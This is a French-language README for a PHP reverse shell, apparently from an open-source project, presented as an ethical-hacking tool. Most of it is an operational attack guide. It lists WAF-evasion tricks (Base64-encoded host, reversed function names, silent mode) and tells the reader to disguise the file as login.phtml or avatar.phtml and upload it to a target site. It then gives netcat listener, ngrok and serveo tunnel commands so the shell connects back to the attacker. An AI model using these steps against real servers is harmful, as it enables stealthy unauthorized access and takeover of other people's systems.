
Ceci est un shell inversé PHP puissant et furtif conçu pour le hacking éthique et les tests de pénétration. Il établit une connexion fiable et silencieuse vers votre machine.
Ceci est un reverse shell PHP puissant et furtif conçu pour le hacking éthique et les tests de pénétration. Il établit une connexion fiable et discrète vers votre machine.
Ce reverse shell PHP est développé strictement à des fins éducatives et de tests de pénétration autorisés uniquement.
Le développeur n'est pas responsable de toute utilisation abusive, des dommages ou de toute activité illégale effectuée à l'aide de ce reverse_shell.
Utilisez-le de manière responsable et uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester. L'accès non autorisé est illégal et puni par la loi.
L'IP et la commande shell sont encodés en Base64 pour plus de discrétion
Les noms de fonctions sont inversés pour contourner les WAF et les filtres de sécurité
Mode silencieux — aucune sortie affichée pour éviter la détection
Se reconnecte automatiquement si la connexion est interrompue
Peut s'exécuter en tant que démon en arrière-plan (si le serveur le permet)
Fonctionne sur la plupart des serveurs supportant PHP
Prend en charge les services de tunneling comme Ngrok, Serveo
Téléchargement avec l'extension .phtml pour contourner certains filtres
1. Démarrez un écouteur sur votre machine
nc -lvnp 4444
2. Encodez votre IP ou nom d'hôte en Base64
Utilisez cette commande simple :
echo "your_ip_or_hostname" | base64
Exemple :
echo "192.168.1.5" | base64
Copiez la sortie et remplacez la valeur de $ip_b64 dans le script reverse shell PHP.
3. Mettez à jour votre script reverse shell PHP :
Modifiez ces lignes avec votre IP/hôte encodé en Base64 et votre port :
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;
4. Renommez le fichier et téléchargez-le
Renommez le fichier pour le rendre moins suspect, par exemple :
login.phtml
avatar.phtml
update.phtml
L'utilisation de l'extension .phtml permet au fichier de s'exécuter sur certains serveurs qui bloquent le .php.
Téléchargez ce fichier sur le site cible où les téléchargements de fichiers sont autorisés.
5. Déclenchez le reverse shell
Ouvrez le fichier téléchargé dans un navigateur :
http://target.com/uploads/login.phtml
Une fois ouvert, votre écouteur recevra une connexion reverse shell.
Si vous utilisez des données mobiles ou êtes derrière un routeur (NAT), votre IP pourrait ne pas être publique. Dans ce cas, le reverse shell ne peut pas atteindre votre machine directement.
Pour résoudre cela, utilisez des outils de tunneling TCP comme Ngrok ou Serveo.
Installez Ngrok
Exécutez cette commande :
ngrok tcp 4444
Cela affichera quelque chose comme :
Forwarding tcp://4.tcp.ngrok.io:18900
Mettez à jour votre script reverse shell PHP :
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;
Démarrez votre écouteur :
nc -lvnp 4444
Exécutez cette commande :
ssh -R 0:localhost:4444 serveo.net
Cela affichera quelque chose comme :
Forwarding TCP connections from serveo.net:46603
Mettez à jour votre script reverse shell PHP :
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;
Démarrez votre écouteur :
nc -lvnp 4444
Ce projet est distribué sous la licence GNU General Public License v3.0